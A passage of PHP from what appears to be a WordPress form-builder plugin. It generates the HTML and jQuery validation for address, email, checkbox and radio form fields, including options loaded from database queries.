                $address_fields .= '<span style="float: '.(($g%2==0) ? 'right' : 'left').'; width: 48%; padding-bottom: 8px;"><input type="text" id="wdform_'.$id1.'_postal'.$form_id.'" name="wdform_'.($id1+4).'_postal'.$form_id.'" value="'.(isset($_POST['wdform_'.($id1+4).'_postal'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.($id1+4).'_postal'.$form_id])) : "").'" style="width: 100%;" '.$param['attributes'].'><label class="mini_label">'.$w_mini_labels[4].'</label></span>';
              }
              $w_countries = array("","Afghanistan","Albania","Algeria","Andorra","Angola","Antigua and Barbuda","Argentina","Armenia","Australia","Austria","Azerbaijan","Bahamas","Bahrain","Bangladesh","Barbados","Belarus","Belgium","Belize","Benin","Bhutan","Bolivia","Bosnia and Herzegovina","Botswana","Brazil","Brunei","Bulgaria","Burkina Faso","Burundi","Cambodia","Cameroon","Canada","Cape Verde","Central African Republic","Chad","Chile","China","Colombia","Comoros","Congo (Brazzaville)","Congo","Costa Rica","Cote d'Ivoire","Croatia","Cuba","Cyprus","Czech Republic","Denmark","Djibouti","Dominica","Dominican Republic","East Timor (Timor Timur)","Ecuador","Egypt","El Salvador","Equatorial Guinea","Eritrea","Estonia","Ethiopia","Fiji","Finland","France","Gabon","Gambia, The","Georgia","Germany","Ghana","Greece","Grenada","Guatemala","Guinea","Guinea-Bissau","Guyana","Haiti","Honduras","Hungary","Iceland","India","Indonesia","Iran","Iraq","Ireland","Israel","Italy","Jamaica","Japan","Jordan","Kazakhstan","Kenya","Kiribati","Korea, North","Korea, South","Kuwait","Kyrgyzstan","Laos","Latvia","Lebanon","Lesotho","Liberia","Libya","Liechtenstein","Lithuania","Luxembourg","Macedonia","Madagascar","Malawi","Malaysia","Maldives","Mali","Malta","Marshall Islands","Mauritania","Mauritius","Mexico","Micronesia","Moldova","Monaco","Mongolia","Morocco","Mozambique","Myanmar","Namibia","Nauru","Nepal","Netherlands","New Zealand","Nicaragua","Niger","Nigeria","Norway","Oman","Pakistan","Palau","Panama","Papua New Guinea","Paraguay","Peru","Philippines","Poland","Portugal","Qatar","Romania","Russia","Rwanda","Saint Kitts and Nevis","Saint Lucia","Saint Vincent","Samoa","San Marino","Sao Tome and Principe","Saudi Arabia","Senegal","Serbia and Montenegro","Seychelles","Sierra Leone","Singapore","Slovakia","Slovenia","Solomon Islands","Somalia","South Africa","Spain","Sri Lanka","Sudan","Suriname","Swaziland","Sweden","Switzerland","Syria","Taiwan","Tajikistan","Tanzania","Thailand","Togo","Tonga","Trinidad and Tobago","Tunisia","Turkey","Turkmenistan","Tuvalu","Uganda","Ukraine","United Arab Emirates","United Kingdom","United States","Uruguay","Uzbekistan","Vanuatu","Vatican City","Venezuela","Vietnam","Yemen","Zambia","Zimbabwe");	
              $w_options = '';
              $post_country = isset($_POST['wdform_'.($id1+5).'_country'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.($id1+5).'_country'.$form_id])) : "";
              foreach($w_countries as $w_country) {              
                if($w_country == $post_country) {
                  $selected = 'selected="selected"';
                }
                else {
                  $selected = '';
                }
                $w_options .= '<option value="'.$w_country.'" '.$selected.'>'.$w_country.'</option>';
              }
              if (isset($w_disabled_fields[5]) && $w_disabled_fields[5]=='no') {
                $g++;
                $address_fields .= '<span style="float: '.(($g%2==0) ? 'right' : 'left').'; width: 48%; padding-bottom: 8px;display: inline-block;"><select type="text" id="wdform_'.$id1.'_country'.$form_id.'" name="wdform_'.($id1+5).'_country'.$form_id.'" style="width:100%" '.$param['attributes'].'>'.$w_options.'</select><label class="mini_label">'.$w_mini_labels[5].'</label></span>';
              }				
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].' width: '.$param['w_size'].'px;"><div>
              '.$address_fields.'</div></div></div>';
              
              if ($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_street1'.$form_id.'").val()=="" || (jQuery("#wdform_'.$id1.'_street1'.$form_id.'").val()=="" && jQuery("#wdform_'.$id1.'_street2'.$form_id.'").val()=="") || jQuery("#wdform_'.$id1.'_city'.$form_id.'").val()=="" || jQuery("#wdform_'.$id1.'_state'.$form_id.'").val()=="" || jQuery("#wdform_'.$id1.'_postal'.$form_id.'").val()=="" || jQuery("#wdform_'.$id1.'_country'.$form_id.'").val()=="")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_street1'.$form_id.'").focus();
                    return false;
                  }
                  
                }
                ';
              }
              $post = isset($_POST['wdform_'.($id1+5).'_country'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.($id1+5).'_country'.$form_id])) : NULL;
              if(isset($post)) {
                $onload_js .=' jQuery("#wdform_'.$id1.'_country'.$form_id.'").val("'.(isset($_POST['wdform_'.($id1+5)."_country".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.($id1+5)."_country".$form_id])) : '').'");';
              }
              if (isset($w_disabled_fields[6]) && $w_disabled_fields[6]=='yes') {
                $onload_js .=' jQuery("#wdform_'.$id1.'_country'.$form_id.'").change(function() { 
                if( jQuery(this).val()=="United States") 
                {
                  jQuery("#wdform_'.$id1.'_state'.$form_id.'").parent().append("<select type=\"text\" id=\"wdform_'.$id1.'_state'.$form_id.'\" name=\"wdform_'.($id1+3).'_state'.$form_id.'\" style=\"width: 100%;\" '.$param['attributes'].'>'.addslashes($w_state_options).'</select><label class=\"mini_label\" style=\"display: block;\" id=\"'.$id1.'_mini_label_state\">'.$w_mini_labels[3].'</label>");
                  jQuery("#wdform_'.$id1.'_state'.$form_id.'").parent().children("input:first, label:first").remove();
                }
                else
                {
                  if(jQuery("#wdform_'.$id1.'_state'.$form_id.'").attr("tagName")=="SELECT")
                  {
              
                    jQuery("#wdform_'.$id1.'_state'.$form_id.'").parent().append("<input type=\"text\" id=\"wdform_'.$id1.'_state'.$form_id.'\" name=\"wdform_'.($id1+3).'_state'.$form_id.'\" value=\"'.(isset($_POST['wdform_'.($id1+3).'_state'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.($id1+3).'_state'.$form_id])) : "").'\" style=\"width: 100%;\" '.$param['attributes'].'><label class=\"mini_label\">'.$w_mini_labels[3].'</label>");
                    jQuery("#wdform_'.$id1.'_state'.$form_id.'").parent().children("select:first, label:first").remove();	
                  }
                }
              
              });';
              }
              break;
            }

            case 'type_submitter_mail': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_first_val','w_title','w_required','w_unique', 'w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              
              $param['w_first_val']=(isset($_POST['wdform_'.$id1.'_element'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element'.$form_id])) : $param['w_first_val']);
                
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? ($param['w_field_label_size']+$param['w_size']) : max($param['w_field_label_size'], $param['w_size']));	
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $input_active = ($param['w_first_val']==$param['w_title'] ? "input_deactive" : "input_active");	
              $required = ($param['w_required']=="yes" ? true : false);	
            
              $rep ='<div type="type_submitter_mail" class="wdform-field"  style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].' width: '.$param['w_size'].'px;"><input type="text" class="'.$input_active.'" id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.$param['w_first_val'].'" title="'.$param['w_title'].'"  style="width: 100%;" '.$param['attributes'].'></div></div>';
              
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()=="'.$param['w_title'].'" || jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()=="")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").addClass( "form-error" );
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").focus();
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").change(function() { if( jQuery(this).val()!="" ) jQuery(this).removeClass("form-error"); else jQuery(this).addClass("form-error");});
                    return false;
                  }
                }
                ';
              }
              $check_js.='
              if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
              {
              
              if(jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()!="" && jQuery("#wdform_'.$id1.'_element'.$form_id.'").val().search(/^\w+((-\w+)|(\.\w+))*\@[A-Za-z0-9]+((\.|-)[A-Za-z0-9]+)*\.[A-Za-z0-9]+$/) == -1 )
                {
                  alert("' . addslashes(__("This is not a valid email address.", 'form_maker')) . '");
                  old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                  x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                  jQuery("#wdform_'.$id1.'_element'.$form_id.'").focus();
                  return false;
                }
              
              }
              ';		
              
              break;
            }

            case 'type_checkbox': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_flow','w_choices','w_choices_checked','w_rowcol', 'w_required','w_randomize','w_allow_other','w_allow_other_num','w_class');
              $temp=$params;

              if(strpos($temp, 'w_field_option_pos') > -1)
				$params_names=array('w_field_label_size','w_field_label_pos','w_field_option_pos','w_flow','w_choices','w_choices_checked','w_rowcol', 'w_required','w_randomize','w_allow_other','w_allow_other_num', 'w_value_disabled','w_choices_value', 'w_choices_params', 'w_class');
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              
              if($temp) {
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
			  
              if(!isset($param['w_value_disabled']))
						$param['w_value_disabled'] = 'no';
				
			  if(!isset($param['w_field_option_pos']))
						$param['w_field_option_pos'] = 'left';
						
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
			  $param['w_field_option_pos1'] = ($param['w_field_option_pos']=="right" ? "style='float: none
			  !important;'" : "");
			  $param['w_field_option_pos2'] = ($param['w_field_option_pos']=="right" ? "style='float: left !important; margin:3px 8px 0 0 !important; display: inline-block !important;'" : "");	
              $required = ($param['w_required']=="yes" ? true : false);	
              $param['w_choices']	= explode('***',$param['w_choices']);
              $param['w_choices_checked']	= explode('***',$param['w_choices_checked']);
			  
               if(isset($param['w_choices_value']))
				{
				   $param['w_choices_value'] = explode('***',$param['w_choices_value']);
				   $param['w_choices_params'] = explode('***',$param['w_choices_params']);	
				}
              $post_value = isset($_POST["counter".$form_id]) ? esc_html($_POST["counter".$form_id]) : NULL;
              $is_other=false;

              if (isset($post_value)) {
                if($param['w_allow_other']=="yes") {
                  $is_other = FALSE;
                  $other_element = isset($_POST['wdform_'.$id1."_other_input".$form_id]) ? esc_html($_POST['wdform_'.$id1."_other_input".$form_id]) : NULL;
                  if (isset($other_element)) {
                    $is_other = TRUE;
                  }
                }
              }
              else {
                $is_other=($param['w_allow_other']=="yes" && $param['w_choices_checked'][$param['w_allow_other_num']]=='true') ;
              }
              $rep='<div type="type_checkbox" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].';">';
            
              $rep.='<div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).'; vertical-align:top">';
			  
              $total_queries = 0;
              foreach ($param['w_choices'] as $key => $choice) {
			  
			     $key1 = $key + $total_queries;
				 if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])
						{
							$choices_labels =array();
							$choices_values = array();

							$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
							$where = (str_replace(array('[',']'), '', $w_choices_params[0]) ? ' WHERE '.str_replace(array('[',']'), '', $w_choices_params[0]) : '');
							$w_choices_params = explode('[db_info]',$w_choices_params[1]);
							
							$order_by = str_replace(array('[',']'), '', $w_choices_params[0]);
							$db_info = str_replace(array('[',']'), '', $w_choices_params[1]);
						
		
							$label_table_and_column = explode(':',str_replace(array('[',']'), '', $choice));
							$table = $label_table_and_column[0];
							$label_column = $label_table_and_column[1];
							if($label_column)
							{
								$choices_labels = $this->model->select_data_from_db_for_labels($db_info, $label_column, $table, $where, $order_by);					
							}	

							$value_table_and_column = explode(':',str_replace(array('[',']'), '', $param['w_choices_value'][$key]));
							$value_column = $value_table_and_column[1];

							if($value_column)
							{
								$choices_values = $this->model->select_data_from_db_for_values($db_info, $value_column, $table, $where, $order_by);
							}		
							$columns_count_checkbox = count($choices_labels)>0 ?  count($choices_labels) : count($choices_values);
							
							if(array_filter($choices_labels) || array_filter($choices_values))
							{
								$total_queries = $total_queries + $columns_count_checkbox-1;
								
								if(!isset($post_value))
									$param['w_choices_checked'][$key]=($param['w_choices_checked'][$key]=='true' ? 'checked="checked"' : '');
									
								for($k=0; $k<$columns_count_checkbox; $k++)
								{
									$choice_label = isset($choices_labels[$k]) ? $choices_labels[$k] : '';
									$choice_value = isset($choices_values[$k]) ? $choices_values[$k] : $choice_label;
										
									if(($key1+$k)%$param['w_rowcol']==0 && ($key1+$k)>0)
										$rep.='</div><div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';  vertical-align:top">';

									if(isset($post_value))
									{
										$post_valuetemp=$_REQUEST['wdform_'.$id1."_element".$form_id.($key1+$k)];
										$param['w_choices_checked'][$key]=(isset($post_valuetemp) ? 'checked="checked"' : '');
									}

									$rep.='<div style="display: '.($param['w_flow']!='hor' ? 'table-cell' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" '.$param['w_field_option_pos1'].'>'.$choice_label[0].'</label><div class="checkbox-div forlabs" '.$param['w_field_option_pos2'].'><input type="checkbox" '.(($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key) ? 'other="1"' : ''	).' id="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" name="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" value="'.htmlspecialchars($choice_value[0]).'" '.(($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key) ? 'onclick="if(set_checked(&quot;wdform_'.$id1.'&quot;,&quot;'.($key1+$k).'&quot;,&quot;'.$form_id.'&quot;)) show_other_input(&quot;wdform_'.$id1.'&quot;,&quot;'.$form_id.'&quot;);"' : '').' '.$param['w_choices_checked'][$key].' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'"></label></div></div>';
									
								}
							}	
						}	
			  else
			  {
                if ($key1%$param['w_rowcol']==0 && $key1>0) {
                  $rep.='</div><div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';  vertical-align:top">';
                }
                if(!isset($post_value)) {
                  $param['w_choices_checked'][$key]=($param['w_choices_checked'][$key]=='true' ? 'checked="checked"' : '');
                }
                else {
                  $post_valuetemp = isset($_POST['wdform_'.$id1."_element".$form_id.$key]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_element".$form_id.$key])) : NULL;
                  $param['w_choices_checked'][$key]=(isset($post_valuetemp) ? 'checked="checked"' : '');
                }
                $choice_value = isset($param['w_choices_value']) ? $param['w_choices_value'][$key] : $choice;
				
                $rep.='<div style="display: '.($param['w_flow']!='hor' ? 'table-cell' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.$key1.'" '.$param['w_field_option_pos1'].'>'.$choice.'</label><div class="checkbox-div forlabs" '.$param['w_field_option_pos2'].'><input type="checkbox" '.(($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key) ? 'other="1"' : ''	).' id="wdform_'.$id1.'_element'.$form_id.''.$key1.'" name="wdform_'.$id1.'_element'.$form_id.''.$key1.'" value="'.htmlspecialchars($choice_value).'" '.(($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key) ? 'onclick="if(set_checked(&quot;wdform_'.$id1.'&quot;,&quot;'.$key1.'&quot;,&quot;'.$form_id.'&quot;)) show_other_input(&quot;wdform_'.$id1.'&quot;,&quot;'.$form_id.'&quot;);"' : '').' '.$param['w_choices_checked'][$key].' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.$key1.'"></label></div></div>';
				
				$param['w_allow_other_num'] = $param['w_allow_other_num']==$key ? $key1 : $param['w_allow_other_num'];
              }
			}
              $rep.='</div>';

              $rep.='</div></div>';
              
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(x.find(jQuery("div[wdid='.$id1.'] input:checked")).length == 0 || jQuery("#wdform_'.$id1.'_other_input'.$form_id.'").val() == "")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    
                    return false;
                  }						
                }
                ';
              }
              if($is_other) {
                $onload_js .='show_other_input("wdform_'.$id1.'","'.$form_id.'"); jQuery("#wdform_'.$id1.'_other_input'.$form_id.'").val("'.(isset($_POST['wdform_'.$id1."_other_input".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_other_input".$form_id])) : '').'");';
              }
              if($param['w_randomize']=='yes')
              {
                $onload_js .='jQuery("#form'.$form_id.' div[wdid='.$id1.'] .wdform-element-section> div").shuffle();
                ';
              }
              $onsubmit_js.='
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_allow_other'.$form_id.'\" value = \"'.$param['w_allow_other'].'\" />").appendTo("#form'.$form_id.'");
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_allow_other_num'.$form_id.'\" value = \"'.$param['w_allow_other_num'].'\" />").appendTo("#form'.$form_id.'");
                ';
              break;
            }

            case 'type_radio': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_flow','w_choices','w_choices_checked','w_rowcol', 'w_required','w_randomize','w_allow_other','w_allow_other_num','w_class');
              $temp=$params;
			  if(strpos($temp, 'w_field_option_pos') > -1)
				$params_names=array('w_field_label_size','w_field_label_pos','w_field_option_pos','w_flow','w_choices','w_choices_checked','w_rowcol', 'w_required','w_randomize','w_allow_other','w_allow_other_num','w_value_disabled','w_choices_value', 'w_choices_params','w_class');

              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              
              if($temp) {
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              if(!isset($param['w_value_disabled']))
						$param['w_value_disabled'] = 'no';
				
			  if(!isset($param['w_field_option_pos']))
						$param['w_field_option_pos'] = 'left';
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
			  $param['w_field_option_pos1'] = ($param['w_field_option_pos']=="right" ? "style='float: none
			  !important;'" : "");
			  $param['w_field_option_pos2'] = ($param['w_field_option_pos']=="right" ? "style='float: left !important; margin:3px 8px 0 0 !important; display: inline-block !important;'" : "");
              $required = ($param['w_required']=="yes" ? true : false);	
              $param['w_choices']	= explode('***',$param['w_choices']);
              $param['w_choices_checked']	= explode('***',$param['w_choices_checked']);
              if(isset($param['w_choices_value']))
			  {
				$param['w_choices_value'] = explode('***',$param['w_choices_value']);
				$param['w_choices_params'] = explode('***',$param['w_choices_params']);	
			  }
              $post_value = isset($_POST["counter".$form_id]) ? esc_html($_POST["counter".$form_id]) : NULL;
              $is_other=false;

              if(isset($post_value)) {
                if($param['w_allow_other']=="yes") {
                  $is_other=false;
                  $other_element = isset($_POST['wdform_'.$id1."_other_input".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_other_input".$form_id])) : "";
                  if(isset($other_element)) {
                    $is_other=true;
                  }
                }
              }
              else {
                $is_other=($param['w_allow_other']=="yes" && $param['w_choices_checked'][$param['w_allow_other_num']]=='true') ;
              }
              $rep='<div type="type_radio" class="wdform-field"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].';">';
            
              $rep.='<div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).'; vertical-align:top">';

			  $total_queries =0;
              foreach($param['w_choices'] as $key => $choice) {
			  
			    $key1 = $key + $total_queries;
			  
			        if(isset($param['w_choices_params']) && $param['w_choices_params'][$key])
						{	
							$choices_labels =array();	
							$choices_values =array();	
							$w_choices_params = explode('[where_order_by]',$param['w_choices_params'][$key]);
							$where = (str_replace(array('[',']'), '', $w_choices_params[0]) ? ' WHERE '.str_replace(array('[',']'), '', $w_choices_params[0]) : '');
							$w_choices_params = explode('[db_info]',$w_choices_params[1]);
							$order_by = str_replace(array('[',']'), '', $w_choices_params[0]);
							$db_info = str_replace(array('[',']'), '', $w_choices_params[1]);
							
							
							$label_table_and_column = explode(':',str_replace(array('[',']'), '', $choice));
							$table = $label_table_and_column[0];
							$label_column = $label_table_and_column[1];
							if($label_column)
							{
								$choices_labels = $this->model->select_data_from_db_for_labels($db_info, $label_column, $table, $where, $order_by);					
							}	

							$value_table_and_column = explode(':',str_replace(array('[',']'), '', $param['w_choices_value'][$key]));
							$value_column = $value_table_and_column[1];

							if($value_column)
							{
								$choices_values = $this->model->select_data_from_db_for_values($db_info, $value_column, $table, $where, $order_by);
							}	
							
							$columns_count_radio = count($choices_labels)>0 ?  count($choices_labels) : count($choices_values);
							if(array_filter($choices_labels) || array_filter($choices_values))
							{
								$total_queries = $total_queries + $columns_count_radio-1;
								
								if(!isset($post_value))
									$param['w_choices_checked'][$key]=($param['w_choices_checked'][$key]=='true' ? 'checked="checked"' : '');
									
								for($k=0; $k<$columns_count_radio; $k++)
								{
									$choice_label = isset($choices_labels[$k]) ? $choices_labels[$k] : '';
									$choice_value = isset($choices_values[$k]) ? $choices_values[$k] : $choice_label;
										
									if(($key1+$k)%$param['w_rowcol']==0 && ($key1+$k)>0)
										$rep.='</div><div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';  vertical-align:top">';

									if(isset($post_value))
									{
										$post_valuetemp=$_REQUEST['wdform_'.$id1."_element".$form_id];
										$param['w_choices_checked'][$key]=(isset($post_valuetemp) ? 'checked="checked"' : '');
									}
									
									$rep.='<div style="display: '.($param['w_flow']!='hor' ? 'table-cell' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" '.$param['w_field_option_pos1'].'>'.$choice_label[0].'</label><div class="radio-div forlabs" '.$param['w_field_option_pos2'].'><input type="radio" '.(($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key) ? 'other="1"' : ''	).' id="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.htmlspecialchars($choice_value[0]).'" onclick="set_default(&quot;wdform_'.$id1.'&quot;,&quot;'.($key1+$k).'&quot;,&quot;'.$form_id.'&quot;); '.(($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key) ? 'show_other_input(&quot;wdform_'.$id1.'&quot;,&quot;'.$form_id.'&quot;);' : '').'" '.$param['w_choices_checked'][$key].' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.($key1+$k).'"></label></div></div>';
								}
							}	
						}	
		    else
			    {
			  
                if($key1%$param['w_rowcol']==0 && $key1>0) {
                  $rep.='</div><div style="display: '.($param['w_flow']=='hor' ? 'inline-block' : 'table-row' ).';  vertical-align:top">';
                }
                if(!isset($post_value)) {
                  $param['w_choices_checked'][$key]=($param['w_choices_checked'][$key]=='true' ? 'checked="checked"' : '');
                }
                else {
                  $param['w_choices_checked'][$key] = (htmlspecialchars($choice) == htmlspecialchars(isset($_POST['wdform_'.$id1."_element".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_element".$form_id])) : "") ? 'checked="checked"' : '');
                }
				$choice_value = isset($param['w_choices_value']) ? $param['w_choices_value'][$key] : $choice;
                $rep.='<div style="display: '.($param['w_flow']!='hor' ? 'table-cell' : 'table-row' ).';"><label class="wdform-ch-rad-label" for="wdform_'.$id1.'_element'.$form_id.''.$key1.'" '.$param['w_field_option_pos1'].'>'.$choice.'</label><div class="radio-div forlabs" '.$param['w_field_option_pos2'].'><input type="radio" '.(($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key) ? 'other="1"' : ''	).' id="wdform_'.$id1.'_element'.$form_id.''.$key1.'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.htmlspecialchars($choice_value).'" onclick="set_default(&quot;wdform_'.$id1.'&quot;,&quot;'.$key1.'&quot;,&quot;'.$form_id.'&quot;); '.(($param['w_allow_other']=="yes" && $param['w_allow_other_num']==$key) ? 'show_other_input(&quot;wdform_'.$id1.'&quot;,&quot;'.$form_id.'&quot;);' : '').'" '.$param['w_choices_checked'][$key].' '.$param['attributes'].'><label for="wdform_'.$id1.'_element'.$form_id.''.$key1.'"></label></div></div>';
				$param['w_allow_other_num'] = $param['w_allow_other_num']==$key ? $key1 : $param['w_allow_other_num'];
				}
             }
              $rep.='</div>';

              $rep.='</div></div>';
            
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none") {
                  if(x.find(jQuery("div[wdid='.$id1.'] input:checked")).length == 0 || jQuery("#wdform_'.$id1.'_other_input'.$form_id.'").val() == "") {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    
                    return false;
                  }						
                }';
              }
              if($is_other) {
                $onload_js .='show_other_input("wdform_'.$id1.'","'.$form_id.'"); jQuery("#wdform_'.$id1.'_other_input'.$form_id.'").val("'.(isset($_POST['wdform_'.$id1."_other_input".$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1."_other_input".$form_id])) : '').'");';
              }
              if($param['w_randomize']=='yes')
              {
                $onload_js .='jQuery("#form'.$form_id.' div[wdid='.$id1.'] .wdform-element-section> div").shuffle();
                ';
              }
              $onsubmit_js.='
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_allow_other'.$form_id.'\" value = \"'.$param['w_allow_other'].'\" />").appendTo("#form'.$form_id.'");
                jQuery("<input type=\"hidden\" name=\"wdform_'.$id1.'_allow_other_num'.$form_id.'\" value = \"'.$param['w_allow_other_num'].'\" />").appendTo("#form'.$form_id.'");
                ';
              break;
            }

            case 'type_own_select': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_choices','w_choices_checked', 'w_choices_disabled','w_required','w_class');
              $temp=$params;
			  
               if(strpos($temp, 'w_choices_value') > -1)
				  $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_choices','w_choices_checked', 'w_choices_disabled', 'w_required', 'w_value_disabled', 'w_choices_value', 'w_choices_params', 'w_class');
				  
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
